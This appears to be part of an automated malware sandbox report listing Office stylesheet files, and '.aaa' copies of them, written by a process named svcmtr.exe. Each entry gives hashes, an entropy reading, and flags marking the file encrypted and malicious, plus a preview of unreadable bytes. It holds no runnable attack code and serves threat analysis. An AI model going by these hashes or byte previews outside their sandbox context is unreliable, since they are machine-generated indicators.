                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126190
                                                                                                                          Entropy (8bit):7.9982591023833
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:bl5T8nBafSlTNwFvzC9LMEVtLmp3PxaO1M4:5h8nkfSlTOBzooEqp3D1F
                                                                                                                          MD5:2A1E5078C3DDEAA72A69877E2B504E3A
                                                                                                                          SHA1:1B37D57B20F1A6453F8075D82DCCACAF3743941B
                                                                                                                          SHA-256:34489B4FEEB81836849604D1852378AB69CE4395EABAD3D03EBAE151A7C0540C
                                                                                                                          SHA-512:0B2C496F14A09D1DA3E9EDC947602A44C781D3BD66CF4741707E7AC5F43F073860215CFCE6EE0C34E3DDBA8AE2EFBA21F76660345C4E34BADFB96882E80E2D2A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.. .&....S0.g/....J...8..hSk.Vb.....|.z.!..=a'B.....o..o..@.@..h..|Q.3.q....y.E.O.vT..dw..e...r-6..^^...PZ...F.\&....R.Y.U.............6..ZeB}3...F&..@.. ..8b...^#ni.$..<|Jn......P.G.m..9.s.ad.e.G.w..F0`....n1..nt.;..9..T..ZY.v;{...U...MNUN9=.V)......+....^..I}|..DQ..\.*..7DN....}..L..&...4..p.Bq.13.................+I..@..[ .m5..v....k.!....X.-?..BJ....T..s.X....,.........=.ow9[y.X...(........w..O..E{...Q....A..N.,..n.T..KP.B.=.=P..*Y......N..s.w...>..X..1:......<....`).k.UN....i.mb...M..9.............I....X....y.r..va[...8.........7.X,.Ae....W\..@.L........(;..W.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125694
                                                                                                                          Entropy (8bit):7.998587762733423
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:OhEeDV0RV5bCCV8ybBJQs6G0zvo4k0Nx6nblTd:OhTDV0R+CCy9JQs6GsQ4kK655
                                                                                                                          MD5:BD204295E0A0E02874271ED0C56B74A9
                                                                                                                          SHA1:E0A57416303AC78D3B31798F26DB83E3C90AE2DD
                                                                                                                          SHA-256:B6B46EBB3A6ED66E76375EB74B5DE71F54EAFDCA7DAD392D80812AE2653448A8
                                                                                                                          SHA-512:5338F34BE8FF3F18CC088ADA870D7AD051EAA07856738AC157B52C2369F26BCC26EC9D2047827DE2D86578E2EBAB4F372BA5B87E864E9154292811693657D11E
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..q...\4.....&<F!X...9...h..n.4.....IA.f...5...3.....)G.1&.:Q.%...~.s..5:T...t... .ENUHC..#.!.l...[..-o..F.d1.xp.......~@.r.....(.ZC....S..m..C"R....'...n6.h.AY.k.-.E..~Y..G.;..&..'.Zg7.ROm.n>...7.........G.X..'c.<..m.eB..m(..!EPuB.s....7...)3..........-$..!_...VB..vZ./..)......#..nSc.h. ..6......../...1.......$+hF..;2,..v#./....A......j....*5l..+...w...R...m.6.`.......L...4.........A.."Y..L~S...:...P.X..~d....Id.N&..v....Wo.E...Id....o.1.l.....O..I2vF.sk.G.(D.#..-.}.y.a(L].x......e....PK=... .{,l....".s..+\Wf..0E.}.j..^...0.lr..D.....".....uI.9^?...r.~C...f..Y..Sx...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125694
                                                                                                                          Entropy (8bit):7.998587762733423
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:OhEeDV0RV5bCCV8ybBJQs6G0zvo4k0Nx6nblTd:OhTDV0R+CCy9JQs6GsQ4kK655
                                                                                                                          MD5:BD204295E0A0E02874271ED0C56B74A9
                                                                                                                          SHA1:E0A57416303AC78D3B31798F26DB83E3C90AE2DD
                                                                                                                          SHA-256:B6B46EBB3A6ED66E76375EB74B5DE71F54EAFDCA7DAD392D80812AE2653448A8
                                                                                                                          SHA-512:5338F34BE8FF3F18CC088ADA870D7AD051EAA07856738AC157B52C2369F26BCC26EC9D2047827DE2D86578E2EBAB4F372BA5B87E864E9154292811693657D11E
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..q...\4.....&<F!X...9...h..n.4.....IA.f...5...3.....)G.1&.:Q.%...~.s..5:T...t... .ENUHC..#.!.l...[..-o..F.d1.xp.......~@.r.....(.ZC....S..m..C"R....'...n6.h.AY.k.-.E..~Y..G.;..&..'.Zg7.ROm.n>...7.........G.X..'c.<..m.eB..m(..!EPuB.s....7...)3..........-$..!_...VB..vZ./..)......#..nSc.h. ..6......../...1.......$+hF..;2,..v#./....A......j....*5l..+...w...R...m.6.`.......L...4.........A.."Y..L~S...:...P.X..~d....Id.N&..v....Wo.E...Id....o.1.l.....O..I2vF.sk.G.(D.#..-.}.y.a(L].x......e....PK=... .{,l....".s..+\Wf..0E.}.j..^...0.lr..D.....".....uI.9^?...r.~C...f..Y..Sx...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):121550
                                                                                                                          Entropy (8bit):7.998277172406489
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:p4ZEU5hEFFMfSzBrRRX4U41uFzU87rS3FJYHmFxn5:p4n5idVRR41qA3gs5
                                                                                                                          MD5:EE91408090AD9B5AC1F350F29397ADEB
                                                                                                                          SHA1:A4CE9BA82878F4882E1EC743E5F43AB415BED748
                                                                                                                          SHA-256:8559C8107D9147DB020E666DF83ED0C928A17E2D6DFABBD6FDAF668A400513C6
                                                                                                                          SHA-512:8EF20369106FF9A7B3511EB275D21B2AB89EDC14208C66B2428D5005001FF3CD339C8CC45D965403F42BC5968DBF732F885DC800B2606A8D158519E3C0E26102
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..e.,.b...e....V./ ....u...@.,s..".._(m._..}.b.`E..c9.~}.....FG..N..D..cV.?......M{......t.n.........UDZIa.s........\.}.c./K.....sw%.~8F"bNv.z.....y.p.t.:a.U.....R.n........z.y.Gr.Q.k.......g...|..8.5.~z:.<'. ..e....(;.V........vV...#m...ky.G.4...N..3m.>om..#.R`..\y....{~...T.=G..&)..CU..!....E...$H..;... ...A.krIw....@..'...4KU...'........3.}.0...b.c.....@../;%{x...e....'h2HZ.h...v.|.\;...F...t.....8.bN_v.ca.0..BYk@<.gn..O..(v8......o..y.d.S.lW^1F..q..8..........8&tP..*.U....D{c.........:.o.R0l..~q=.e...l....7x..i./.).0.H0g.....>g)......q...U+.C=.._..0u.idGY~.+5.H.lBIm%.....!.../

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):121550
                                                                                                                          Entropy (8bit):7.998277172406489
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:p4ZEU5hEFFMfSzBrRRX4U41uFzU87rS3FJYHmFxn5:p4n5idVRR41qA3gs5
                                                                                                                          MD5:EE91408090AD9B5AC1F350F29397ADEB
                                                                                                                          SHA1:A4CE9BA82878F4882E1EC743E5F43AB415BED748
                                                                                                                          SHA-256:8559C8107D9147DB020E666DF83ED0C928A17E2D6DFABBD6FDAF668A400513C6
                                                                                                                          SHA-512:8EF20369106FF9A7B3511EB275D21B2AB89EDC14208C66B2428D5005001FF3CD339C8CC45D965403F42BC5968DBF732F885DC800B2606A8D158519E3C0E26102
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..e.,.b...e....V./ ....u...@.,s..".._(m._..}.b.`E..c9.~}.....FG..N..D..cV.?......M{......t.n.........UDZIa.s........\.}.c./K.....sw%.~8F"bNv.z.....y.p.t.:a.U.....R.n........z.y.Gr.Q.k.......g...|..8.5.~z:.<'. ..e....(;.V........vV...#m...ky.G.4...N..3m.>om..#.R`..\y....{~...T.=G..&)..CU..!....E...$H..;... ...A.krIw....@..'...4KU...'........3.}.0...b.c.....@../;%{x...e....'h2HZ.h...v.|.\;...F...t.....8.bN_v.ca.0..BYk@<.gn..O..(v8......o..y.d.S.lW^1F..q..8..........8&tP..*.U....D{c.........:.o.R0l..~q=.e...l....7x..i./.).0.H0g.....>g)......q...U+.C=.._..0u.idGY~.+5.H.lBIm%.....!.../

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME43.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125118
                                                                                                                          Entropy (8bit):7.998476257188882
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:AycIOm98KI9TU018CyfWlJumvVJ1Gc1+VW5uWydf4AIoUGi/X70+pOTfpDFamqX1:1DeKIxD8Cyfml1r0W5PyprizqLcLAsOw
                                                                                                                          MD5:F2F570B8E21966C50DC64A79720B83B4
                                                                                                                          SHA1:5F07367E13117E10AE8AD670E83EEFEAEC09139B
                                                                                                                          SHA-256:070357521A4FB75E8332394A60D0768F839BA53DDE53B2A93FB0A2D2053E5EF7
                                                                                                                          SHA-512:C56966DA65C5CD9457EEE158FBAFA6A43434BD052D3407E6595FEA49590A88041A315ACCEF6DDC4F2C79FCCE7597ABE6ED12348768D43DFE7F92090B642865F1
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...$}...zh.)....^.....5kD.......~9'.zB.....-{g.V [....p@.Cv).j.Z...er..Q..?;..........`{.7f.......aC......q...N.p$...Cj.E....P#pR4Ff..\..L?..h...$;.H....h.AB..Z..K.sw...nc...G[t_......r....c~....%..eq...V..\9u'..Oh...[B...>..Ny.`D#./...=...Y.y......jCR..7..g.(..Zn.M.../.*.FD.Y7-..K.u...N....(..h..{.|.....S.......l..1G.[-.....).@...I.Z..H{....E.....+O}..~.W%..c.... L....A.H..q;'.i..n3.+_...........f..E...t...{...O......Ps.&.. .qM....zp..8.*_B.bg....../....%J..$...f...).....XX.+R.N..........i.M ..P&B...2....A[..z\SN.c...!x@m..&.%KV1..5...n.?1.G..Z..`.......V..L.......#}..Z...&Ct.c.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME43.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125118
                                                                                                                          Entropy (8bit):7.998476257188882
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:AycIOm98KI9TU018CyfWlJumvVJ1Gc1+VW5uWydf4AIoUGi/X70+pOTfpDFamqX1:1DeKIxD8Cyfml1r0W5PyprizqLcLAsOw
                                                                                                                          MD5:F2F570B8E21966C50DC64A79720B83B4
                                                                                                                          SHA1:5F07367E13117E10AE8AD670E83EEFEAEC09139B
                                                                                                                          SHA-256:070357521A4FB75E8332394A60D0768F839BA53DDE53B2A93FB0A2D2053E5EF7
                                                                                                                          SHA-512:C56966DA65C5CD9457EEE158FBAFA6A43434BD052D3407E6595FEA49590A88041A315ACCEF6DDC4F2C79FCCE7597ABE6ED12348768D43DFE7F92090B642865F1
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...$}...zh.)....^.....5kD.......~9'.zB.....-{g.V [....p@.Cv).j.Z...er..Q..?;..........`{.7f.......aC......q...N.p$...Cj.E....P#pR4Ff..\..L?..h...$;.H....h.AB..Z..K.sw...nc...G[t_......r....c~....%..eq...V..\9u'..Oh...[B...>..Ny.`D#./...=...Y.y......jCR..7..g.(..Zn.M.../.*.FD.Y7-..K.u...N....(..h..{.|.....S.......l..1G.[-.....).@...I.Z..H{....E.....+O}..~.W%..c.... L....A.H..q;'.i..n3.+_...........f..E...t...{...O......Ps.&.. .qM....zp..8.*_B.bg....../....%J..$...f...).....XX.+R.N..........i.M ..P&B...2....A[..z\SN.c...!x@m..&.%KV1..5...n.?1.G..Z..`.......V..L.......#}..Z...&Ct.c.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME44.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126622
                                                                                                                          Entropy (8bit):7.998788089276808
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:nlYdWnKeHDGcSpov6SxXNf6Gwj8C135MhmJ:n+hlcsoCSflwBBahk
                                                                                                                          MD5:5D0D03C97D5F841ECAAF1DF979CF8903
                                                                                                                          SHA1:60AB6922D47F6DD9D1F87744EBE394F4C543652A
                                                                                                                          SHA-256:091D16698143AC61A38B6B275551F3FF438E7319108E23991546656F291A807B
                                                                                                                          SHA-512:D2C6E17D42411F164F5BA388934193DF4BD5B40F45407995857F42C7701D9D63F336F7EA74AB485B76841617839EE87133E3C34F70FF6E79285DA32A0E663747
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..rC..5..e,.$0.f......~..|...ua..LW.l.B...,&I...!....B.SY.i.Ls..l8..+.<.L..0.A..>..Y.....!.k.b..W..b.X..U../{...P.Nd.|.1b[d.[R.].k..Or...g...CP....5..U.U.n.....`64e....j....9.+...=..]d..y....H....*...i....%;R0W~.a..y;.......^.#ERx$...1T...n.^E^ *i.,0._...l..n4.<..w...... GP*O.5UjK\|.f5....P`/.'.i.{>.E..>....R.o...;^.|..p.#.ua5.O...H...f..X1.:.Mx..jV..)H{..Q.-..w.w.@BJU0.s....!....%.b..9.X..1...%..)..7..........i.8.lu.y'>..lq....FR...>'[R.f....].p.......5#.)-...C.n..M..=1d*l[:.".'...F..52.BqO.mPf.8%pY..S.9..Y|7B*u~..q..3.G.]._.'..;....W..@]..\...b...N...[...:\>..[.Rf..4..-

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME44.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126622
                                                                                                                          Entropy (8bit):7.998788089276808
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:nlYdWnKeHDGcSpov6SxXNf6Gwj8C135MhmJ:n+hlcsoCSflwBBahk
                                                                                                                          MD5:5D0D03C97D5F841ECAAF1DF979CF8903
                                                                                                                          SHA1:60AB6922D47F6DD9D1F87744EBE394F4C543652A
                                                                                                                          SHA-256:091D16698143AC61A38B6B275551F3FF438E7319108E23991546656F291A807B
                                                                                                                          SHA-512:D2C6E17D42411F164F5BA388934193DF4BD5B40F45407995857F42C7701D9D63F336F7EA74AB485B76841617839EE87133E3C34F70FF6E79285DA32A0E663747
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..rC..5..e,.$0.f......~..|...ua..LW.l.B...,&I...!....B.SY.i.Ls..l8..+.<.L..0.A..>..Y.....!.k.b..W..b.X..U../{...P.Nd.|.1b[d.[R.].k..Or...g...CP....5..U.U.n.....`64e....j....9.+...=..]d..y....H....*...i....%;R0W~.a..y;.......^.#ERx$...1T...n.^E^ *i.,0._...l..n4.<..w...... GP*O.5UjK\|.f5....P`/.'.i.{>.E..>....R.o...;^.|..p.#.ua5.O...H...f..X1.:.Mx..jV..)H{..Q.-..w.w.@BJU0.s....!....%.b..9.X..1...%..)..7..........i.8.lu.y'>..lq....FR...>'[R.f....].p.......5#.)-...C.n..M..=1d*l[:.".'...F..52.BqO.mPf.8%pY..S.9..Y|7B*u~..q..3.G.]._.'..;....W..@]..\...b...N...[...:\>..[.Rf..4..-

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125006
                                                                                                                          Entropy (8bit):7.998447418885008
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Ofy0KxfASoVEI2ecFDqyyy2lOCwW7s9a5yrAZqpzBya81IC+0:4K9IxaDqrZl0ja5yrLzYaYl+0
                                                                                                                          MD5:311DE03F596C43398FFDD08ECE33B174
                                                                                                                          SHA1:042F01CC3026D7287E03A2D73C54685FDAD5A183
                                                                                                                          SHA-256:D85216BCD3DE45AAAE14FE82692A82D78BBE96825A126377B4548518431E8C9E
                                                                                                                          SHA-512:B33B2439FAF62BE2948123F307A666D84BE10FD03752716D01654277D54536DAE468C018EA350C4C5E424D73637EF97E2EC6C9C59CBC6823B12A9C0B8F293FD5
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264............4..&........a5a].....B0z..U.;.9...\wW*...4D>[....A.[.N.....y..w..T.1....(.#....i...UW...a."..*z...`...9..!.Y.....0.:.u''..3|.%..fN02..)...-).z...B5...V...\C.z....e3s...[..Pr..`{....#_...aS..L.._G...5.D....vHF..Q..o....9...9.!....[fA.Hs.....S ....A......v.H..|..b<.z.i.gy.7%E.k.A@.....=..<N..v......Q..,.z........J..N..!..P..=.....t..,J..E.....N.....N..P.X{...-...[...!|~..@[.]..|...x@5"!~.....@...z7.Aq......p....gH.....}AR....."...4G....A ..8....+.......Pf...z...P.x.z.e..)...^.)..$M/....Uc......sm.bIQ..R.g..%m.6N.|/..B-...1O...;6...Y.\.....?e.D.x...a.NR....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125006
                                                                                                                          Entropy (8bit):7.998447418885008
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Ofy0KxfASoVEI2ecFDqyyy2lOCwW7s9a5yrAZqpzBya81IC+0:4K9IxaDqrZl0ja5yrLzYaYl+0
                                                                                                                          MD5:311DE03F596C43398FFDD08ECE33B174
                                                                                                                          SHA1:042F01CC3026D7287E03A2D73C54685FDAD5A183
                                                                                                                          SHA-256:D85216BCD3DE45AAAE14FE82692A82D78BBE96825A126377B4548518431E8C9E
                                                                                                                          SHA-512:B33B2439FAF62BE2948123F307A666D84BE10FD03752716D01654277D54536DAE468C018EA350C4C5E424D73637EF97E2EC6C9C59CBC6823B12A9C0B8F293FD5
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264............4..&........a5a].....B0z..U.;.9...\wW*...4D>[....A.[.N.....y..w..T.1....(.#....i...UW...a."..*z...`...9..!.Y.....0.:.u''..3|.%..fN02..)...-).z...B5...V...\C.z....e3s...[..Pr..`{....#_...aS..L.._G...5.D....vHF..Q..o....9...9.!....[fA.Hs.....S ....A......v.H..|..b<.z.i.gy.7%E.k.A@.....=..<N..v......Q..,.z........J..N..!..P..=.....t..,J..E.....N.....N..P.X{...-...[...!|~..@[.]..|...x@5"!~.....@...z7.Aq......p....gH.....}AR....."...4G....A ..8....+.......Pf...z...P.x.z.e..)...^.)..$M/....Uc......sm.bIQ..R.g..%m.6N.|/..B-...1O...;6...Y.\.....?e.D.x...a.NR....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME46.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130910
                                                                                                                          Entropy (8bit):7.998411062706421
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:wKA6K14Lrrtlh81+xLTtqkyM1DqUdN5d+1hLMn8o8Q/iz4vRGyB9jnsz1HP7a:p3LHtWgQk7Vws9n6qX4z1Hm
                                                                                                                          MD5:50911F88DFBE61690FEA1672ACB4F511
                                                                                                                          SHA1:2B8736892F370BED923F7D0CCE35A969606EA8C0
                                                                                                                          SHA-256:F834405D9896D5EF0D8A15E0EF8358386526100A9C0CE0B56C859132A236BBBA
                                                                                                                          SHA-512:5254D7F2D4188CCA9DC3B1C900C0F2FA92FD025EEF96E038B20B595AE2DB5BDD8DA725576EACCCFDC99E2E47B622B659B46E9A2C998A9FA4E121027ED179E24C
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..e..b8.U.1...n........CH.0....._..."N.#....a.%z.o....v}.......i.............\.........$.....2.TR.N.:.)...d....I,.e9....q.Li(...}..5#4.{..&Q..P.!h.B.l(,...JN.#.DYF..."9....!..V>7.JEK.._...q.+(..|..........u....\JjgP...:..D.a.FT..w8zF<.7.>......e.|I+....gy..^...w..O(.G.[VD|.iC..Ak..V...pM.}9tb..K=.]Ds...k.......Y....C....8...R..L...B.8S......z... ..%.3t...G`p.....4y4...q..."8.NJR..y`k..P.._.`).\..e?...."CV@.-uy.R..!NF..;j`.._;...4p{?..3.I.U.....W$U..1.......P..^..!.~..]H..P..@.......y.m.R.....R.Q...E.DM?c.B..#.......Z..S.1......I` 4`.Q-..5.......*.H...?...\d.H....g.`[...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME46.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130910
                                                                                                                          Entropy (8bit):7.998411062706421
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:wKA6K14Lrrtlh81+xLTtqkyM1DqUdN5d+1hLMn8o8Q/iz4vRGyB9jnsz1HP7a:p3LHtWgQk7Vws9n6qX4z1Hm
                                                                                                                          MD5:50911F88DFBE61690FEA1672ACB4F511
                                                                                                                          SHA1:2B8736892F370BED923F7D0CCE35A969606EA8C0
                                                                                                                          SHA-256:F834405D9896D5EF0D8A15E0EF8358386526100A9C0CE0B56C859132A236BBBA
                                                                                                                          SHA-512:5254D7F2D4188CCA9DC3B1C900C0F2FA92FD025EEF96E038B20B595AE2DB5BDD8DA725576EACCCFDC99E2E47B622B659B46E9A2C998A9FA4E121027ED179E24C
                                                                                                                          Malicious:true
